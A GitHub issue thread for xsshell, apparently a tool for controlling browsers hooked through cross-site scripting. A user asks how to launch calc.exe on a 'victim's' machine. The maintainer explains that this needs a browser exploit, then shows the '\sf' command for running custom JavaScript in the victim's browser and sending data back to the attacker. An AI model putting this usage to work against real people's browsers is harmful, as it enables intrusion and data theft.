### ISSUE TITLE
js backdoor

### ISSUE THREAD

**Issue by switchy7** [raz-varren/xsshell#1]
Hello, can you please tell me is there possible, when i already hooked the browser, to run some js to run calc.exe on the victims machine?

**Comment by raz-varren** [comment]
In order to do that, the javascript you execute would need to exploit the browser into running arbitrary OS level commands. Which is unlikely if the victim is using an up to date browser. If you do happen to have such a script available to you, or your victim is using an old browser that is exploitable in this way, then you can execute any arbitrary javascript on the victim's browser with the `\sf` command.

#### Example:

```
//contents of /home/myuser/js/my-custom-browser-exploit.js
alert('helo victim!');
this.send('helo attacker return data!');
```
`xsshell > \sf /home/myuser/js/my-custom-browser-exploit.js`

This will execute the contents of `my-custom-browser-exploit.js` on the victim's browser and return any data sent with `this.send('');` to the attacker's console.
